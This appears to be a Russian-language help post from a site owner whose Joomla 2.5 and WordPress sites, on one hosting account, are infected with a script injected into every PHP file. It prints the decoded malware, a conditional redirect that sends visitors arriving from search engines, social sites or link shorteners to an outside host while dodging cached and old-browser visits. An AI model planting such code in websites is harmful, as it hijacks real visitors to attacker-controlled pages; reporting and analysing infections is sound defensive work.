Заражены два сайта. Один на Joomal 2.5, другой на WordPress. Оба сайта лежат на одном хостинг-аккаунте. Вредоносный скрипт внедрен во все php файлы по одному или несколько раз:
Расшифрованный он выглядит так:
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){ header("Location: http://oeprfa.ddns.me.uk/"); exit(); } } } } }